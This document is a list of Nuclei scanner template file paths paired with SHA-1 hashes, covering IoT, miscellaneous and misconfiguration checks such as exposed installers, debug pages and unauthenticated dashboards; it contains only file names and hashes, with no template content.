+nuclei-templates/iot/network-camera-detect.yaml:42b4ef01008f00d83e7815ac0f07e3582b6e8388 +nuclei-templates/iot/novus-ip-camera.yaml:3e7238977ba2cc7b028f25d5433dcf0266f90bec +nuclei-templates/iot/nuuno-network-login.yaml:8a98b8f8536bfb1c565f3eaecee678e0a4f884ee +nuclei-templates/iot/octoprint-3dprinter-detect.yaml:a737e82e41e110e7edd924a8c7c639b7bb9d5222 +nuclei-templates/iot/open-mjpg-streamer.yaml:b0577145d623d719bf5118f95b2f419c84fd1b33 +nuclei-templates/iot/panasonic-network-management.yaml:ccc0093fb3670652200a39765522e0d7ab374bf6 +nuclei-templates/iot/pqube-power-analyzers.yaml:4f5ace653dadb80230621678b47865bf9a0b0bbf +nuclei-templates/iot/qvisdvr-deserialization-rce.yaml:e87311b6bd332c71503e8df193dbcf17a96d17b6 +nuclei-templates/iot/routeros-login.yaml:5dc4481b7bc7fbd5b8fc7b309d657bc40b1ac3d3 +nuclei-templates/iot/selea-ip-camera.yaml:6dcefcfc280a5a2a44fba832187efc49a6cbe90f +nuclei-templates/iot/stem-audio-table-private-keys.yaml:ac96786a1eb01ad20e59877744d3703cdef73a17 +nuclei-templates/iot/targa-camera-lfi.yaml:6edf9ff5e666bc1fe9937de188fa3ff20fcced74 +nuclei-templates/iot/targa-camera-ssrf.yaml:339b2cf3bdc5f0e07556f5083a17fe93db1fdff2 +nuclei-templates/iot/upnp-device.yaml:a08302ec91960abf17385785ab2441e2e1d3f45a +nuclei-templates/iot/webcamxp-5.yaml:1c35a3121ec30f51d9b8a8eeeb27d9587b7c6813 +nuclei-templates/iot/webtools-home.yaml:0f69e27a4f89ca8ee53ee3e962480819c5ff6412 +nuclei-templates/iot/xp-webcam.yaml:712b96cdd7c1ab49f90f414cccc16a94e44a4180 +nuclei-templates/iot/zebra-printer-detect.yaml:58d84201064651d72580ee393cc468a6cd96eb1d +nuclei-templates/miscellaneous/addeventlistener-detect.yaml:78fdaf81776684390c6584578f9a8db726f33d7c +nuclei-templates/miscellaneous/apple-app-site-association.yaml:efeac90734f25b74c641f40e2806ddab5faf5395 +nuclei-templates/miscellaneous/aws-ecs-container-agent-tasks.yaml:84c94b59439119e9df81d4eb13ac0db1abe51b56 +nuclei-templates/miscellaneous/clientaccesspolicy.yaml:a27c7e727ee05426bd34771710b52c04b1dfae3b +nuclei-templates/miscellaneous/detect-dns-over-https.yaml:7b4a4441bf40b7bfa42ceb6e7ca9dac663497214 +nuclei-templates/miscellaneous/dir-listing.yaml:b79058b148228805fdb00a65f54fa44d5e0c0285 +nuclei-templates/miscellaneous/email-extractor.yaml:3de521eb65d1c2db3c4e5a5929dd0979f85abbb7 +nuclei-templates/miscellaneous/firebase-database-extractor.yaml:64a0576d33a080208e302fbcf181e568d1f11e7c +nuclei-templates/miscellaneous/google-floc-disabled.yaml:39f866697f7ea632cf88aa9dd4b3e360c8cf1703 +nuclei-templates/miscellaneous/htaccess-config.yaml:f4c329e0cd4800497883557780644f53814bd4df +nuclei-templates/miscellaneous/joomla-htaccess.yaml:0a02d0066cdc22293ef973789f68a40f43a6e187 +nuclei-templates/miscellaneous/joomla-manifest-file.yaml:57713b8a7b29c2f071eb9651f706c8ad2d915145 +nuclei-templates/miscellaneous/microsoft-azure-error.yaml:64900420aa55d47addb4892a73ca5303ff7a0860 +nuclei-templates/miscellaneous/moodle-changelog.yaml:4850c5d8f5d5f0bc507d513c7ff9e4a1d76d0467 +nuclei-templates/miscellaneous/netflix-conductor-version.yaml:41d000cb6546bdea79a5eaccea5793659a98f4f9 +nuclei-templates/miscellaneous/ntlm-directories.yaml:a87dbe24d90ef337d0728ffebaf094b4f99afe4e +nuclei-templates/miscellaneous/old-copyright.yaml:9f019a0db8df86e0c5ecec1a25bf3d2aaa50ba49 +nuclei-templates/miscellaneous/options-method.yaml:fbfc3f08b2f0ceb46a5c548cf6e23337b8d802a6 +nuclei-templates/miscellaneous/robots-txt-endpoint.yaml:9de6438d611d81eb71f25a2934aaa5bebd63ac1e +nuclei-templates/miscellaneous/robots-txt.yaml:58fd612a9d92d8b9285c0acd3b8d1aabc8cdca40 +nuclei-templates/miscellaneous/security-txt.yaml:f10b993ec2bd8d718e4fa26ccb3793756ccdec4f +nuclei-templates/miscellaneous/trace-method.yaml:fe9bae3302b4a10de8d699279fe78d4b468ba2be +nuclei-templates/miscellaneous/unpatched-coldfusion.yaml:54ad0ca51bfffa58b55ca8528cab3620be3fceee +nuclei-templates/miscellaneous/x-recruiting-header.yaml:3f8cf3804eee55dc8cf8cb32027b3e1516d2fb14 +nuclei-templates/miscellaneous/xml-schema-detect.yaml:fd614aa4e60f1ee7f2358059f9f116623f85da12 +nuclei-templates/misconfiguration/ace-admin-dashboard.yaml:af41e47517e4dad6113c605dfdaea66f3636ac28 +nuclei-templates/misconfiguration/adobe/adobe-connect-username-exposure.yaml:7184c6d680c3243645afeb988f38a75ff66a6b64 +nuclei-templates/misconfiguration/adobe/adobe-connect-version.yaml:f66e5ab6d473f508d69c76854ad1f3a9d9ada8cd +nuclei-templates/misconfiguration/aem/aem-acs-common.yaml:e1e45cd02d2ba10ee0dcac69e10bf7f59a1d397d +nuclei-templates/misconfiguration/aem/aem-bg-servlet.yaml:0fddbf62b452f526e294c04c269a21b245465847 +nuclei-templates/misconfiguration/aem/aem-bulkeditor.yaml:6bdf7193d1a69df776d7bb17622b768bee230ebd +nuclei-templates/misconfiguration/aem/aem-cached-pages.yaml:954c34038533e1c42d5bd02753b6ffd8f52debdd +nuclei-templates/misconfiguration/aem/aem-crx-browser.yaml:da4fe0f0d046b8c4cec1e40ecdd5fcdf5074d393 +nuclei-templates/misconfiguration/aem/aem-crx-bypass.yaml:a2f819f65edf3147a6443b3e213a8343f7b82ac5 +nuclei-templates/misconfiguration/aem/aem-crx-namespace.yaml:8b45c8550531391d8bc807efd53d5ace71d15931 +nuclei-templates/misconfiguration/aem/aem-crx-search.yaml:e7fd153f04a3325db0e46643221f8617015a0148 +nuclei-templates/misconfiguration/aem/aem-custom-script.yaml:e6a97c9c3e98f2d52fc05c2c63619cb4027fc2cd +nuclei-templates/misconfiguration/aem/aem-debugging-libraries.yaml:e8e91a814cf95a1d073eba05927619dbdbcffdce +nuclei-templates/misconfiguration/aem/aem-default-get-servlet.yaml:d54de280fe821d7d68eb38d6ce676bbbc2abaed9 +nuclei-templates/misconfiguration/aem/aem-disk-usage.yaml:b9bf3b04138c91731a34426bfe80144b290cc6d0 +nuclei-templates/misconfiguration/aem/aem-dump-contentnode.yaml:ae21fcab3ee9617fff0e957167e2a4fe816c945d +nuclei-templates/misconfiguration/aem/aem-explorer-nodetypes.yaml:b4082a41f9cb1ca2df5fbc3f0c6ce818fd297c13 +nuclei-templates/misconfiguration/aem/aem-external-link-checker.yaml:a541802db1e886ca96d2145655d40b9f7b602e97 +nuclei-templates/misconfiguration/aem/aem-gql-servlet.yaml:760c9cc3afcee83277b9db14a64b323148170d58 +nuclei-templates/misconfiguration/aem/aem-groovyconsole.yaml:5a63343e3035495439ec69ef58779a92d1d3b8bf +nuclei-templates/misconfiguration/aem/aem-hash-querybuilder.yaml:4df469d4f94166cb0162c6465f307feaefc49140 +nuclei-templates/misconfiguration/aem/aem-jcr-querybuilder.yaml:c115914a6d089c504bb7d06015b6a193ce142786 +nuclei-templates/misconfiguration/aem/aem-login-status.yaml:231b5228f44b1cd1f3971257b5b17255281ba9a7 +nuclei-templates/misconfiguration/aem/aem-merge-metadata-servlet.yaml:cae45f1dfd5db82311eed4a8b46eca6c121ee274 +nuclei-templates/misconfiguration/aem/aem-misc-admin.yaml:914ce83f210f689ef5efead347b370c2ed69970b +nuclei-templates/misconfiguration/aem/aem-offloading-browser.yaml:da23f23134b2d447755d3ecafe88b958c8527e06 +nuclei-templates/misconfiguration/aem/aem-osgi-bundles.yaml:d5ab4c8fba25b91d70a72e82744491e103f77c4e +nuclei-templates/misconfiguration/aem/aem-querybuilder-feed-servlet.yaml:05e1fc02475049cdc721928f5cdba333d2c109d4 +nuclei-templates/misconfiguration/aem/aem-querybuilder-internal-path-read.yaml:d42f96d634030d5a3910c644c7f1738a9a6a5a5f +nuclei-templates/misconfiguration/aem/aem-querybuilder-json-servlet.yaml:791e4c9c57999f01aa4d8758c3614875fba5e754 +nuclei-templates/misconfiguration/aem/aem-security-users.yaml:e6d53207c55f3531e11fce90c7db420bda94f023 +nuclei-templates/misconfiguration/aem/aem-setpreferences-xss.yaml:247e7be621fa5950f8017fc9376ca05c1110af4f +nuclei-templates/misconfiguration/aem/aem-sling-userinfo.yaml:9627c75ae153f49f5e7a08d99f92dbaa88e6965e +nuclei-templates/misconfiguration/aem/aem-userinfo-servlet.yaml:d7dba9deaf4dcfc15d7c8341717acff759db49fb +nuclei-templates/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:78dae07fe55b62bc1352a0665e0ee6ff2ef4dbeb +nuclei-templates/misconfiguration/aem/aem-xss-childlist-selector.yaml:2286142949431c9cda2a18754a58a482dd970351 +nuclei-templates/misconfiguration/airflow/airflow-debug.yaml:a52e47293a571b3b7da2e05346e94ecbc5f4e014 +nuclei-templates/misconfiguration/airflow/unauthenticated-airflow.yaml:4656e41cd02a2dc0b3967d82609f65bfe2dedd74 +nuclei-templates/misconfiguration/akamai-arl-xss.yaml:db2d9e853ece20da4dad915bc06f80db8369f034 +nuclei-templates/misconfiguration/alibaba-mongoshake-unauth.yaml:752c987d58889078b08b3fc067d9816eaf0792d8 +nuclei-templates/misconfiguration/ampache-update-exposure.yaml:12de4cc1fbe95df99ea82a3bbdbab1096fdd62b1 +nuclei-templates/misconfiguration/ampps-dirlisting.yaml:e0d7542cf8314171fdc1b361c977215d7a8bb1b3 +nuclei-templates/misconfiguration/android-debug-database-exposed.yaml:e86dd1b6462aa24e2f33ed08bb6f420c818842a1 +nuclei-templates/misconfiguration/apache/apache-filename-enum.yaml:37f91a178a87a83517cb933ee2daa539a8e85253 +nuclei-templates/misconfiguration/apache/apache-hbase-unauth.yaml:0dbb8ba4c8392db6b4b58da6de97ae2b0e30112c +nuclei-templates/misconfiguration/apache/apache-storm-unauth.yaml:ef8a6015d6beeada055d81ce7d974ffc806ce96f +nuclei-templates/misconfiguration/apache/tomcat-pathnormalization.yaml:18f88e5932018f3e46268c3373823e48f6373327 +nuclei-templates/misconfiguration/apache-drill-exposure.yaml:0027240750b516907b433a271dd4a2001bf43ddf +nuclei-templates/misconfiguration/apache-druid-unauth.yaml:e81e6e413515687a2fcdd48deab9f037d44da890 +nuclei-templates/misconfiguration/apc-info.yaml:6a8b19adac71973b6adb6be84b55dfb77f902ef7 +nuclei-templates/misconfiguration/application-yaml.yaml:cb57a3023ac893378813e1b8e07bc3695d7e9c20 +nuclei-templates/misconfiguration/artifactory-anonymous-deploy.yaml:2044d6cb821dff9a1623cbe9fdef8cc188f9e156 +nuclei-templates/misconfiguration/aspx-debug-mode.yaml:fcb07141c210b46b376cebf92fa92eb7bddc730f +nuclei-templates/misconfiguration/atlassian-bamboo-build.yaml:3ddd0baa4816a8befd3d80907793143ebac1e957 +nuclei-templates/misconfiguration/aws-object-listing.yaml:2743c60082f9d4e47b126df0dc04b92979dc7c71 +nuclei-templates/misconfiguration/aws-redirect.yaml:09f725fd45bb1a7aac17ba00659cae83daa825e0 +nuclei-templates/misconfiguration/aws-s3-explorer.yaml:8fd3d861b36f05cc8dd827e5f42338a13f2dfc4e +nuclei-templates/misconfiguration/aws-xray-application.yaml:326adeee15d4ffc6d28ff97d6dc61fceca1d3bf4 +nuclei-templates/misconfiguration/awstats-listing.yaml:7eeac9032ed757a44e3e3d1e16671ea7553e923f +nuclei-templates/misconfiguration/bitbucket-public-repository.yaml:93b5979eb01e04e72c7985194df9df93045c25be +nuclei-templates/misconfiguration/blackbox-exporter-metrics.yaml:8350116c820f7009fd73a74b76c25d08d4f33eee +nuclei-templates/misconfiguration/bootstrap-admin-panel-template.yaml:f0949f623aea172730b7ac2378ad3f230650834d +nuclei-templates/misconfiguration/browserless-debugger.yaml:73a7cc41ff1ed17caaca6530d43ce15ebd421897 +nuclei-templates/misconfiguration/caddy-open-redirect.yaml:2c155fafee96cfddefd8b93b28ab609e3a01ffc7 +nuclei-templates/misconfiguration/cadvisor-exposure.yaml:4278c879c553f01cb465cae64bc9e94ff1f6ddfb +nuclei-templates/misconfiguration/cgi-test-page.yaml:12d3d3d2643d7c78a908afab84e4fe36a50a1f91 +nuclei-templates/misconfiguration/clockwork-dashboard-exposure.yaml:9f069eb98e8edfa5afcd89c44efcf6cedada7661 +nuclei-templates/misconfiguration/cloud-metadata.yaml:8b638d6cf6e0197687f5ce7a8eba7060d9c9e5c7 +nuclei-templates/misconfiguration/cloudflare-image-ssrf.yaml:69e086dd4a4a1736686e3d822980bfbc505ec8ba +nuclei-templates/misconfiguration/cobbler-exposed-directory.yaml:fbdb895ce7caf9b54eebbaf113c546260b79dc32 +nuclei-templates/misconfiguration/codemeter-webadmin.yaml:1ead4ca4980684a7fd999b28b234305ef9577929 +nuclei-templates/misconfiguration/codis-dashboard.yaml:c652864687b7236615c0d5f9f661cdcf98d49c83 +nuclei-templates/misconfiguration/collectd-exporter-metrics.yaml:40d15e9e91e29bca21c6a3ddb7d37d95661384e6 +nuclei-templates/misconfiguration/command-api-explorer.yaml:f784eafe5eb49975606a664835065bc0ac009a11 +nuclei-templates/misconfiguration/confluence/confluence-oauth-admin.yaml:84a2fc0144aea89f813c30eec8617ace1a1afc9c +nuclei-templates/misconfiguration/confluence-dashboard.yaml:6d915d81fda9c54177717b837d8f639abbff8101 +nuclei-templates/misconfiguration/corebos-htaccess.yaml:b018016410cbd86734b5efb4623bc755f0c9dacb +nuclei-templates/misconfiguration/cx-cloud-upload-detect.yaml:9894283cab54961ba96a153be6aa07c95d196b64 +nuclei-templates/misconfiguration/d-link-arbitary-fileread.yaml:4e6b553752978c0a59347797efd35637984c4122 +nuclei-templates/misconfiguration/database-error.yaml:ceb203b73f0eff0306a16f407ef1f67575edd5c2 +nuclei-templates/misconfiguration/debug/ampache-debug.yaml:b1d6b9ef8a88dfa0f51a37120b06959226379467 +nuclei-templates/misconfiguration/debug/bottle-debug.yaml:c776fd480a90eebb9463f876da9e1c4fdce9ce81 +nuclei-templates/misconfiguration/debug/flask-werkzeug-debug.yaml:2535f771f54941ff6d86d860e3904b436eeddf09 +nuclei-templates/misconfiguration/debug/github-debug.yaml:5a6e83aecd66b2ab5aa05bbf5dda7d975bb29519 +nuclei-templates/misconfiguration/dgraph-dashboard-exposure.yaml:6e0b3f1883a38eac8dbbb9b27a92da12cf9d6ce0 +nuclei-templates/misconfiguration/django-debug-detect.yaml:bfce44ee058bf5d0b5471c01008615c0f2abfce7 +nuclei-templates/misconfiguration/docker-registry.yaml:9dc2c12ebf53e1674aa524e21fbf12c9710b4965 +nuclei-templates/misconfiguration/docmosis-tornado-server.yaml:089263ddc578b99f6106d8e79f7c77a9496d7362 +nuclei-templates/misconfiguration/druid-monitor.yaml:3236da24049f1f7bf123258b7d25a134e1908236 +nuclei-templates/misconfiguration/drupal/drupal-user-enum-ajax.yaml:0577c69f26201ecf45f46a66717d64bd0458f721 +nuclei-templates/misconfiguration/drupal/drupal-user-enum-redirect.yaml:d00ffbf48e1b5cd154f738a486f77365132c6f1f +nuclei-templates/misconfiguration/ec2-instance-information.yaml:43b7a45b97cbca3a9a5ed7977902746e614e66bb +nuclei-templates/misconfiguration/elastic-hd-dashboard.yaml:4ba992b74b9891c902599359501e429821316de1 +nuclei-templates/misconfiguration/elasticsearch.yaml:558f0647f9d332581388314921496cd4216d5574 +nuclei-templates/misconfiguration/encompass-cm1-homepage.yaml:a6fda68bac411337dc7fd7d7f906e20d02de31eb +nuclei-templates/misconfiguration/envoy-admin-exposure.yaml:230139f3a19d42d450d8f2c48bc0c7d99c248f7b +nuclei-templates/misconfiguration/espeasy-mega-exposure.yaml:853f83ad03b32d46f11bbf5be0f9651d4d9d9c16 +nuclei-templates/misconfiguration/etcd-unauthenticated-api.yaml:086742fe08e7b61c8680aeb3db85f1ab88c218d1 +nuclei-templates/misconfiguration/exposed-docker-api.yaml:ddcb0d22ec3f0fd777bab559ae4934a297d7e0cb +nuclei-templates/misconfiguration/exposed-jquery-file-upload.yaml:325f880b7da5949f01dd5db1ed5773a182493346 +nuclei-templates/misconfiguration/exposed-kafdrop.yaml:85e110d313b5de3510c3324e66542637d4dba854 +nuclei-templates/misconfiguration/exposed-kibana.yaml:43d5387f950f01e865b2a1acf89829ad16a2e121 +nuclei-templates/misconfiguration/exposed-service-now.yaml:b90085c3ee90c4a267d33a0e41f6b4cdbb0e425c +nuclei-templates/misconfiguration/exposed-sqlite-manager.yaml:685f02edfd0f9b48365bc62cb4a868474eadff57 +nuclei-templates/misconfiguration/express-stack-trace.yaml:818e81478f5e5f788fcbf01757bcd6ed4274ff40 +nuclei-templates/misconfiguration/formalms-install.yaml:b1af0f15c0e7b51fc3ecbee3a964d64a1987818b +nuclei-templates/misconfiguration/front-page-misconfig.yaml:ec7b8fdf2a89bc8085b0a906609ebe9cb70e4083 +nuclei-templates/misconfiguration/git-web-interface.yaml:036a790f4a30014fa575abfd5d3172ac2c855dc5 +nuclei-templates/misconfiguration/gitea-public-signup.yaml:50e51e1e56430f88ae859e3a89c8a17c692efd1e +nuclei-templates/misconfiguration/gitlab/gitlab-api-user-enum.yaml:708361855c9897df5722c7a5725c4600e2813fa0 +nuclei-templates/misconfiguration/gitlab/gitlab-public-repos.yaml:982b0cd45d665b77aa03871419e47530d20f5047 +nuclei-templates/misconfiguration/gitlab/gitlab-public-signup.yaml:8bfc385bccd643a904cd1cacdbf4341ceb918afc +nuclei-templates/misconfiguration/gitlab/gitlab-public-snippets.yaml:0cb2a925ecf9632d867675778a12914e38c57004 +nuclei-templates/misconfiguration/gitlab/gitlab-uninitialized-password.yaml:8949737b6bc386011f70cfe0b1fcd5556d3ffac7 +nuclei-templates/misconfiguration/gitlab/gitlab-user-enum.yaml:b40e951b9ab4032efda494588539b682b8c33f95 +nuclei-templates/misconfiguration/gitlist-disclosure.yaml:94abf8cb46336e268c26aa24af4b72050fd5fd5c +nuclei-templates/misconfiguration/global-traffic-statistics.yaml:943eed4b079beb6deff1bafcba25615a50e62d4b +nuclei-templates/misconfiguration/glpi-directory-listing.yaml:205c8815303ed94227985dd8462cc51e75899b4e +nuclei-templates/misconfiguration/gocd/gocd-cruise-configuration.yaml:89e28f4277293797788b055f81b4600051654df3 +nuclei-templates/misconfiguration/gocd/gocd-encryption-key.yaml:0c8b4dcce4a9d990c1d2f37dbac33e720d1efd72 +nuclei-templates/misconfiguration/gocd/gocd-unauth-dashboard.yaml:dbbf507d573e1b67c34798e5ff3ec7f23636aef3 +nuclei-templates/misconfiguration/google/insecure-firebase-database.yaml:4aaf772862b2f8bb2e7e04ce089181f01756b208 +nuclei-templates/misconfiguration/grafana-public-signup.yaml:31cc2cd8d5d51028a35fed727d4cf5ccfd31c40c +nuclei-templates/misconfiguration/graphql/graphql-alias-batching.yaml:1651ce592f86c8855745a3c3f247e464c7238996 +nuclei-templates/misconfiguration/graphql/graphql-array-batching.yaml:682e3dc4437d4b75cfa7a1853af65ae5da5ab9ac +nuclei-templates/misconfiguration/graphql/graphql-field-suggestion.yaml:c8e898ea1fe58b6662de3f76f3d13fadb6ae8308 +nuclei-templates/misconfiguration/graphql/graphql-get-method.yaml:36a06267a4cbd5f432d7ec888b21bde7da60145a +nuclei-templates/misconfiguration/graphql/graphql-playground.yaml:281de1494a04b4aa8282a10846d6d55e37dcbf4e +nuclei-templates/misconfiguration/hadoop-unauth-rce.yaml:9642fb02f97d147a76813d17067f767eda0d46cb +nuclei-templates/misconfiguration/haproxy-exporter-metrics.yaml:f3c0147a424ec8e49a45e36a3873059e6057a163 +nuclei-templates/misconfiguration/haproxy-status.yaml:fa1a1042cca268ac4dbbe14907d7a511a7c3f024 +nuclei-templates/misconfiguration/healthchecks-ui-exposure.yaml:4414684f5a65751905f1fc6082e0791e8977c12c +nuclei-templates/misconfiguration/hfs-exposure.yaml:74441a5bc9af2f5eedcfda17872d0a6af02477d3 +nuclei-templates/misconfiguration/hivequeue-agent.yaml:52cd8c28dd2e128f10a6d5392aa1cc1e63884fc2 +nuclei-templates/misconfiguration/hp/unauthorized-hp-printer.yaml:7e538ad83f0b679cb0c41ec0cdae450dd036b363 +nuclei-templates/misconfiguration/hp/unauthorized-printer-hp.yaml:6779524f1989883dc4ed341a71b0cb120e2e169e +nuclei-templates/misconfiguration/hpe-system-management-anonymous.yaml:57cbbc6f17de504b1472381f593c53ded438e85b +nuclei-templates/misconfiguration/http-missing-security-headers.yaml:fdebe9b775234c5116e2ed773fe6fba3d7c36025 +nuclei-templates/misconfiguration/ibm-friendly-path-exposure.yaml:934ebc22598345df8366bd35c1fb5421494a23f4 +nuclei-templates/misconfiguration/iis-internal-ip-disclosure.yaml:d43ae1b8822937a949cb8eff2750dd07608b2bb0 +nuclei-templates/misconfiguration/installer/ampache-music-installer.yaml:c1f207ad73415987f7fd2dc8b104122305eae6d7 +nuclei-templates/misconfiguration/installer/avideo-install.yaml:756156cbc1fec18818484accf7e369b8576d9229 +nuclei-templates/misconfiguration/installer/bagisto-installer.yaml:d7dce787d7ed0fda4a13814ea78576a824f2fa43 +nuclei-templates/misconfiguration/installer/binom-installer.yaml:31205d4db23e8873c0dac424dec54b41beb69370 +nuclei-templates/misconfiguration/installer/blesta-installer.yaml:a21e35ab20a818630b892b9ffc15f3de6755cf90 +nuclei-templates/misconfiguration/installer/cloudcenter-Installer.yaml:85ea31db956a49ac5db78157525284f074eee733 +nuclei-templates/misconfiguration/installer/codeigniter-installer.yaml:6f028b1285376447374c0815e7e3533127c89302 +nuclei-templates/misconfiguration/installer/contentify-installer.yaml:54e4ef9bd02bb08029814e21c4a626335e04e30e +nuclei-templates/misconfiguration/installer/discourse-installer.yaml:8aaef3654160e7e5fd4a2e72222c96702f9a0bf9 +nuclei-templates/misconfiguration/installer/dokuwiki-installer.yaml:65d77092abbea48639e2246b145415113c713d1e +nuclei-templates/misconfiguration/installer/eshop-installer.yaml:689e62d3ac8fedd7fe9d232b97a1c20fc23d876a +nuclei-templates/misconfiguration/installer/espeasy-installer.yaml:070e126579145fcb112b7186659ab4c7dbc8802a +nuclei-templates/misconfiguration/installer/facturascripts-installer.yaml:5220e29a47107bdbd4590953e279277aabdf606a +nuclei-templates/misconfiguration/installer/geniusocean-installer.yaml:090c8249a3e7111e4d849e8258609542cb2973c1 +nuclei-templates/misconfiguration/installer/gitea-installer.yaml:28a0e7e979ce396801a1c55b165bb11a24632009 +nuclei-templates/misconfiguration/installer/joomla-installer.yaml:db7de0d1c709eb74c6d8f9237afa11d96f435db0 +nuclei-templates/misconfiguration/installer/limesurvey-installer.yaml:b672db92515fa6e6111ad7164700ecd83ff6b4ba +nuclei-templates/misconfiguration/installer/lmszai-installer.yaml:a56e69cf06159698f9b790af1c1dd15f18d56971 +nuclei-templates/misconfiguration/installer/lychee-installer.yaml:1e2acbc8ccdc85a1be291a0bf0464eb61aad7019 +nuclei-templates/misconfiguration/installer/magento-installer.yaml:569a98e116572b2e111658564a71d9c3d91548fe +nuclei-templates/misconfiguration/installer/matomo-installer.yaml:78e3f71d1a54de0a7c937d89df60472643ad1d2a +nuclei-templates/misconfiguration/installer/mautic-installer.yaml:560bd0d6eee0858a67b337ed14775843d70acedb +nuclei-templates/misconfiguration/installer/moodle-installer.yaml:345ef26ac2dd97ea0822462cf74c27cbc8b33044 +nuclei-templates/misconfiguration/installer/nginx-auto-installer.yaml:8c6a99938c21d921a3129671f0023c73aee98b3f +nuclei-templates/misconfiguration/installer/nodebb-installer.yaml:55eb58cf77798b6d56fbbb00294660a8e4b022da +nuclei-templates/misconfiguration/installer/nopcommerce-installer.yaml:7206500647bfa39f13983730fba502630b071bc6 +nuclei-templates/misconfiguration/installer/openmage-install.yaml:e68d39f3f3a880666a28c4300c5b32189b45eff7 +nuclei-templates/misconfiguration/installer/opensis-installer.yaml:9b6d042c0b4e1d95be4196acef88e6b15f765df6 +nuclei-templates/misconfiguration/installer/owncloud-installer-exposure.yaml:1c535eadfb60b2ebedf34f14929ea9b3ab6e0de0 +nuclei-templates/misconfiguration/installer/oxid-eshop-installer.yaml:23f849a8942f349e4d38e3d14fa96b73546bcbe7 +nuclei-templates/misconfiguration/installer/pagekit-installer.yaml:bb5fda4b65e12967dc26e0267df56f62f82c548e +nuclei-templates/misconfiguration/installer/permissions-installer.yaml:0ef32b5300a93c0a08b45a2272b7ef3e0d5d9744 +nuclei-templates/misconfiguration/installer/phpbb-installer.yaml:d25dac76da1733f2c2def2bfe2334c0009ae426e +nuclei-templates/misconfiguration/installer/phpwind-installer.yaml:1d482416122692a41203ae529c570453ca0d624e +nuclei-templates/misconfiguration/installer/piwik-installer.yaml:bb9c125a7b51517a82a1f9a4bdadc0402c14df4c +nuclei-templates/misconfiguration/installer/prestashop-installer.yaml:bcb45a987e64bbf33443f4c086308aaf7e3e6673 +nuclei-templates/misconfiguration/installer/processwire-installer.yaml:93c7f0bc3288bf85e9d28a8b9000b8aef5e5f285 +nuclei-templates/misconfiguration/installer/redash-installer.yaml:5e25df0e4d1679985b81e833e6f2a9080f50a6d4 +nuclei-templates/misconfiguration/installer/server-monitor-installer.yaml:b0af5ccac214fae04f715e095bdfad71b184eeda +nuclei-templates/misconfiguration/installer/shopify-app-installer.yaml:95ed144f40098d4cfcbdad7f5dfdd600c9a18f7e +nuclei-templates/misconfiguration/installer/smf-installer.yaml:bf42b25e28dac937b6ae60596b589320b6fcb136 +nuclei-templates/misconfiguration/installer/sms-installer.yaml:b5695a615317105190e30c80581496ef4e377e14 +nuclei-templates/misconfiguration/installer/suitecrm-installer.yaml:133499012c170841cb74a645ffd27b4108fe13ae +nuclei-templates/misconfiguration/installer/sumowebtools-installer.yaml:7c0cea2157f5e8dcf2eb8c45d69f11fced63984e +nuclei-templates/misconfiguration/installer/tasmota-install.yaml:ed11a2c3cdcbe061d14d16666902ec1201d4349d +nuclei-templates/misconfiguration/installer/testrail-install.yaml:e69425bcbdb1e9202665637791cbca872a7549d2 +nuclei-templates/misconfiguration/installer/tiny-rss-installer.yaml:dc943c8e70450ef972ecd31a5ce4aef01c1b1844 +nuclei-templates/misconfiguration/installer/turbo-website-installer.yaml:ea3f9066685c9a501381c2e9cf4fe8407d24eb16 +nuclei-templates/misconfiguration/installer/typo3-installer.yaml:9b3f560ff16d075e605349065e8a2f34f2d11996 +nuclei-templates/misconfiguration/installer/umbraco-installer.yaml:5aa04ada070e8679558747be5a3fc2bb736e7951 +nuclei-templates/misconfiguration/installer/unifi-wizard-install.yaml:8d3d1ccc6f994747e14b383b6262de113b166448 +nuclei-templates/misconfiguration/installer/uvdesk-install.yaml:5e6629c2b6993f258ae0117143fe8db3f8c60d81 +nuclei-templates/misconfiguration/installer/vtiger-installer.yaml:2b4cd23b187884baecdd9272616667bc49e02d47 +nuclei-templates/misconfiguration/installer/webasyst-installer.yaml:c74bcd4e1982a3a6edd78b89314aa7cc428bf39b +nuclei-templates/misconfiguration/installer/webuzo-installer.yaml:b5a8ebaa5cd131662f0f7ad594080bd98c8b7c4f +nuclei-templates/misconfiguration/iot-vdme-simulator.yaml:58c05579549e47c6d30eda0926a00db11b72bada +nuclei-templates/misconfiguration/jaeger-ui-dashboard.yaml:b729cd97e62969019295969c3054b01a174d5e08 +nuclei-templates/misconfiguration/java-melody-exposed.yaml:184b34e9cd2669d919aa2ba1ae83ac256b737cf0 +nuclei-templates/misconfiguration/jboss-status.yaml:ee9875634d9151096e5b18caa2a7757c7c14dafb +nuclei-templates/misconfiguration/jenkins/jenkins-openuser-register.yaml:79a6ce0deec9d1c811f2373f394f4d7fa254149b +nuclei-templates/misconfiguration/jetty-showcontexts-enable.yaml:c266e93094f77edab6c7f442d0bf73aa65823bbf +nuclei-templates/misconfiguration/jkstatus-manager.yaml:cb9b56571046214e35484653867c0f8e9573e395 +nuclei-templates/misconfiguration/jolokia/jolokia-info-disclosure.yaml:8efa02b7d5eb1b1c0d2947b3c912694943359856 +nuclei-templates/misconfiguration/jolokia/jolokia-list.yaml:722f5c4211b9a9d44dff19c6634119ce3274f4fe +nuclei-templates/misconfiguration/jolokia/jolokia-mbean-search.yaml:461c305477e34bb147cc8d618b6924ef540fc125 +nuclei-templates/misconfiguration/jolokia/jolokia-unauthenticated-lfi.yaml:989e149bf4b6dcdcd825c51d84b5fb12f7b5b28e +nuclei-templates/misconfiguration/jupyter-ipython-unauth.yaml:3ce6dc6468f727ac6b555d9d94ec489e328114e6 +nuclei-templates/misconfiguration/jupyter-notebooks-exposed.yaml:e9093bbee16a2bd81724d6cf9e260f6c16cb04e2 +nuclei-templates/misconfiguration/kafka-cruise-control.yaml:faab06b94e05d68218ddf4dbd1269e38c340e569 +nuclei-templates/misconfiguration/kubeflow-dashboard-unauth.yaml:69fcb5594a83f8e67882613d183a7bdfe94da908 +nuclei-templates/misconfiguration/kubernetes/kubernetes-metrics.yaml:8ffd4cc096cfa20bda990fef625860c66cade484 +nuclei-templates/misconfiguration/kubernetes/kubernetes-pods.yaml:17e09ed085c41ceaf01f00a05b186a7a56394273 +nuclei-templates/misconfiguration/kubernetes/kubernetes-resource-report.yaml:664c22a3ffa124711b6c95b44716e9fd5d097fa2 +nuclei-templates/misconfiguration/laravel-debug-enabled.yaml:533ccf4fd6ecc5a81cf7ab9d38c402eb39bb4132 +nuclei-templates/misconfiguration/laravel-debug-error.yaml:bf8dfe8d786609647ae8fcac73867c3373b5bda3 +nuclei-templates/misconfiguration/libvirt-exporter-metrics.yaml:3e460c6a77af357cf4033ba2bcfab0f5ec2326f6 